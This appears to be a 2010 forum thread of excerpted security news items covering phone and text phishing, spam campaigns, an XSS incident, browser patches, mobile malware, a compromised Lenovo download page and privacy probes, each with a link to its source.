17 total posts
A Spike in Phone Phishing Attacks?
A couple of readers have written in to say they recently received automated telephone calls warning them about fraud on their credit card accounts and directing them to call a phone number to ?verify? their credit card numbers. These voice phishing attacks, sometimes called ?vishing,? are a good reminder that today?s scam artists often abuse a range of modern technologies to perpetrate old-fashioned fraud.
Phone phishing schemes often begin with a pre-recorded message that prompts the recipient to call a supplied telephone number ? frequently a toll-free line. Usually, the calls will be answered by bogus interactive voice response system designed to coax account credentials and other personal information from the caller.
Lures for these telephone phishing attacks also are sent via text message, a variant also known as smishing. Indeed, the Sacramento Bee warned last week that residents in the area were receiving text messages spoofing the Yolo Federal Credit Union.
Continued here: http://krebsonsecurity.com/2010/06/a-spike-in-phone-phishing-attacks/
Double trouble - spam and malware payloads
Don?t you hate spam? It?s a nuisance, but not anything you really need to worry about, is it? I mean, it?s not like you ran an executable, you just found yourself somewhere trying to sell you Viagra, no harm done, right? Wrong - one recent campaign in particular highlights this fact.
Graham?s been talking about spam campaigns we?ve seen this last week containing html attachments. With topics currently covering Adult Friend Finder, romantic interest & Skype purchases, Facebook porn & Skype payment problems, and Facebook password resets, the spam?s trying very hard to get you to open its attachment. And if you do, you get taken to a page from our old friends at Canadian Pharmacy: [...]
At which point you presumably close the window, and chalk up the experience as another annoying run-in with spam. Case closed ? or is it?
When you open the attachment it loads a page from a remote website which looks something like this: [...]
Facebook Pushes Its Privacy Controls over Lingering Concerns
Facebook continued to push back against lingering concerns over its privacy controls, issuing a blog post and a letter detailing the ways in which it stewards users' personal data. Privacy advocates issued an open letter to Facebook CEO Mark Zuckerberg June 16, asking for more user control over information contained on the site. In response, Facebook issued a counter-letter addressing the advocates? concerns point-by-point, and followed that up with a corporate blog posting on June 18 detailing how its privacy settings worked. According to reports, the privately held company may have earned as much as $800 million in 2009.
This week saw Facebook push back against lingering concerns over how it uses member data, using resources such as its corporate blog to insist that individual privacy remains its utmost concern. While the social-networking site?s revenues and membership have only increased over the past year, a rising chorus of privacy groups and individual users has questioned the controls over personal information.
On June 18, a posting on the Facebook blog described how the social-networking site attempts to give users control over that information. ?We recently launched simplified privacy settings in response to feedback that certain Facebook settings had become too complicated,? Monica Horak, an associate with the Facebook user operations team, wrote in a June 18 posting on the Facebook blog. ?Facebook gives you two ways to [control] what information you share with applications and Websites.?
It's Signed, therefore it's Clean, right?
From the F-Secure Weblog:
Security firms taking days to block malware
"Can you hold on till Friday?"
Anti-malware vendors can take up to 92.48 hours to block malicious sites, potentially leaving clients in blissful ignorance of threats to their systems in the meantime.
Security researchers ISS Labs reviewed a range of endpoint security products from ten big-name security vendors and their response to "socially engineered or consensual malware threats".
It said 15,000 to 50,000 such threats were presenting themselves per day.
Effectiveness rates varied from a 35 per cent block rate to a more comforting 88.3 per cent.
Vendors' average times to respond to new threats ranged from 4.62 hours to 92.48 hours, with the high end turned in by Panda, IDC said. Of the 10 vendors profiled, just three managed response times of less than 30 hours.
Continued here: http://www.theregister.co.uk/2010/06/21/malware_delays/
GoogleCL: Command-line tool for Google services
Google has released a new utility that allows programmers and power users to access a variety of Google services using command line prompts. GoogleCL is an open source Python application that uses the Python gdata libraries (Google Data Python Client Library) to connect to the company's online services.
Supported Google services currently include, for example, Blogger, Calendar, Docs, Contacts, YouTube and the Picasa photo sharing site. Google has posted a number of Example Scripts that show how to create a new Blogger post, Calendar entry or Contact, and upload a video to YouTube. The developers note that, in addition to standard tarball and .deb package downloads, they "hope to have it included in Debian and Ubuntu repositories in time for their next releases."
Continued here: http://www.h-online.com/open/news/item/GoogleCL-Command-line-tool-for-Google-services-1025911.html
From the F-Secure Weblog:
When a company is hit with a cross-site scripting (XSS) attack, the natural reaction is to downplay the significance of the incident.
After all, an XSS vulnerability on a site does not mean that the site could be hacked or shut down. A typical XSS demonstration showing a funny dialog box on somebody else's site just emphasizes how harmless such an attack looks.
However, XSS is not harmless. We were just hit by one last night. And we do not want to downplay it.
The vulnerability on f-secure.com was found by security researcher Xylitol. He reported it yesterday evening. Xylitol is well-known for finding XSS vulnerabilities on sites such as army.mil, ibm.com and nasa.gov.
Continued here: http://www.f-secure.com/weblog/archives/00001972.html
Spammers Target Facebook and Twitter at Once
From TrendLabs Malware Blog:
Due to their ever-growing popularity, social networks have been a continuous target of cybercriminals to proliferate their malicious schemes. TrendLabsSM received samples of another Facebook spam, this time also taking advantage of the popular micro-blogging site, Twitter. [...][...]
The mail, which poses as a Facebook notification message, uses adult-themed strings to lure users into opening the attachment. The .ZIP file attachment, Twitter.zip, contains the file twitter.html, which has an embedded malicious script that Trend Micro detects as JS_REDIR.AE.
Social networks are still on the verge of reaching their peak, as an increasing number of users spend more time on managing their accounts. According to the latest findings by Nielsen, social networking and blogging account for one in every four-and-a-half minutes people spend online.
With Facebook still remaining as one of the world?s most popular social media sites and Twitter not far behind, cybercriminals will most likely use these sites more and more to propagate malicious codes.
Continued here: http://blog.trendmicro.com/spammers-target-facebook-and-twitter-at-once/
Network access control vendors pass endpoint security testin
Network access control vendors pass endpoint security testing
"Alcatel-Lucent, Bradford, Enterasys, ForeScout, McAfee go above and beyond"
One of the main promises of network access control is that you can ensure that endpoint security tools are up to date and that non-compliant machines can be identified or blocked. As regulatory compliance has grown in importance, NAC vendors have reacted by building strong feature sets aimed at endpoint security and compliance. In our NAC testing, we had good, and sometimes great, results across the board when it came to endpoint security.
NAC: What went wrong?
We created a very basic endpoint security policy, and then checked to see if we could implement that policy in our NAC products. We also looked at a variation on endpoint security, the ability of NAC products to handle system misbehavior. For example, if a typical, compliant, desktop started to try and brute-force break into other systems by guessing passwords, that would be a misbehavior we'd like to detect. Whether the desktop is infected, or the user is acting maliciously, it's still misbehavior and NAC can help put a stop to it.
Continued here: http://www.networkworld.com/reviews/2010/062110-network-access-control-test-end-point.html
Opera 10.54 closes critical security holes
Norwegian vendor Opera has presented version 10.54 of its browser to close four security holes, one of which the company rates as extremely severe and as another highly severe. The company plans to protect users until the majority have updated to the new version, by only releasing details of the flaws at a later date. Opera advises all users to update to the latest release as soon as possible.
The Mac version fixes numerous other minor bugs and instabilities, and now automatically uninstalls the old version during auto-updates. Last week, Opera released version 10.6 beta for Windows, Mac OS X, and Unix; this version is considerably faster and prettier than its predecessor.
Continued here: http://www.h-online.com/security/news/item/Opera-10-54-closes-critical-security-holes-1026360.html
See Vulnerabilities & Fixes: Opera Multiple Unspecified Vulnerabilities
Mobile malware is a reality says Kaspersky
Mobile malware has been bubbling along in the background of the security world for the last few years but, according to Denis Maslennikov, Kaspersky Lab's mobile research group manager, the rise in smartphone sales is triggering a surge in mobile malware amongst cybercriminals.
Speaking at Kaspersky Lab's recent analyst summit, Maslennikov said that the first piece of mobile malware using the internet dates back to 2004, when a Ukrainian hacker developed the code.
Cybercriminals, he said, then lost interest in these types of programmes, until quite recently 35% of all detected smartphone malware was tracked as operating via the internet.
Continued here: http://www.infosecurity-us.com/view/10407/mobile-malware-is-a-reality-says-kaspersky-/
Update: Apple launches iOS 4 upgrade
"The iPhone OS update became available just after 1 p.m. ET"
Apple will release the iOS 4 update today around 1 p.m. ET, 10 a.m. PT, according to claims from users citing calls to the company's sales and support desks.
As of 11:45 a.m. ET, the update, which Apple said earlier this month would be delivered today, was not yet available via iTunes. Apple updated iTunes to version 9.2 last week to make the software compatible with the new mobile OS.
Several iPhone owners on Apple's support forum claimed that they had been told by Apple support personnel that the iOS 4 update would launch at 10 a.m. PT. Apple is headquartered in Cupertino, Calif., in the Pacific Time zone.
Computerworld was not able to confirm the reported launch time; Apple's telephone lines were swamped with calls, with wait times that exceeded 30 minutes.
Continued here: http://www.computerworld.com/s/article/9178352/Update_Apple_launches_iOS_4_upgrade
Also: Apple iPhone iOS 4 Arrives: 10 Reasons to Upgrade
Malicious code on Lenovo driver download page - Update
The driver download portal of hardware manufacturer Lenovo temporarily deployed malicious code. Various virus scanners issued alerts about a Java-based Trojan downloader or dropper. The iframe injected by attackers points to the volgo-marun.cn server and can still be found on several pages of the download.lenovo.com server.
However, the injected links to the Chinese server are now pointing to a non-existent target, so there is no longer an immediate threat. The Firefox and Chrome web browsers have also started to warn their users about accessing this server. Since Lenovo doesn't appear to have responded, the security hole may still be open, which would potentially allow attackers to deploy updated iframe links on the download pages at any time.
Continued (with update) here: http://www.h-online.com/security/news/item/Malicious-code-on-Lenovo-driver-download-page-Update-1025886.html
30 states may join probe of Google Wi-Fi snoop
"'As many questions as answers'"
As many as 30 states may investigate Google for surreptitiously sniffing traffic traveling over open Wi-Fi networks over a three-year span, Connecticut's top law-enforcement official said on Monday.
Connecticut Attorney General Richard Blumenthal said his office will lead the multi-state investigation into the unauthorized data collection by Google Street View cars. A ?significant number of states? are expected to participate, according to a press release issued by his office that claimed representatives from more than 30 states joined a recent telephone conference call to discuss the probe.
?While we hope Google will continue to cooperate, its response so far raises as many questions as it answers,? Blumenthal said in the release. ?The company must provide a complete and comprehensive explanation of how this unauthorized data collection happened, why the information was kept if collection was inadvertent and what action will prevent a recurrence.?
Continued here: http://www.theregister.co.uk/2010/06/21/google_wifi_snoop_inquiries/
Report IDs domain name registrars who sponsor illegal ..
Report IDs domain name registrars who sponsor illegal activity
From the Sunbelt Blog:
Anti-spam group KnujOn ("NoJunk" backwards), a member of the Internet Corporation for Assigned Names and Numbers (ICANN), has issued a nearly 100-page report detailing how some domain name registrars are actively shielding pharma and other illegal groups by protecting their web sites from takedown. The report (PDF) names names.
ICANN is responsible for managing the assignment of domain names and IP addresses on behalf of the U.S. government.
KnujOn's report quotes John Horton, President of LegitScript.com: ?The Internet rule is straightforward. Domain name registrars are required by ICANN to prohibit domain owners from using their domains for unlawful purposes. Without exception, this rule is also reflected in each registrar?s terms and conditions, thus formalizing and protecting the company?s contractual right to suspend domain names for unlawful activity. Once a registrar becomes aware that a website is engaged in criminal activity, the company has the legal authority and technical ability to suspend the domain name, rendering the illegal and fraudulent content inaccessible. This self-policing is meant to balance freedom of speech with safety and legitimacy as the Internet continues to evolve. But all too often, registrars simply turn a blind eye to criminal activity.?
Continued here: http://sunbeltblog.blogspot.com/2010/06/report-ids-domain-name-registrars-who.html
Scam Alert: GoDaddy "Order Confirmation" email is a Scam
I just received on of these e-mails myself so I checked it out because I have not ordered anything from GoDaddy.
[quote]By Denise Richardson on June 21, 2010 5:01 PM
Quick scam alert...DO NOT FALL FOR the latest email scam circulating. It arrives as an order confirmation from Go-Daddy and though it appears to look very authentic -it's anything but that. The email includes Go-Daddy's official phone number and logo and it also includes a few infected links that the scammers hope you will click on. When clicked on you will undoubtedly download malicious spyware onto your computer.
The phony order confirmation comes is a receipt for $357.00 worth of bulk domain names you recently purchased and allows you to click on links and pictures in the email for additional info.
Do not click on any links or pictures.
Go-daddy has been flooded with calls on this scam - and it's easy to see why. The email looks very legit.
If you received this email, delete it immediately.
If you received it and already clicked on the links - update your virus protection, run a full scan on your computer and dump all data you may have in your cache.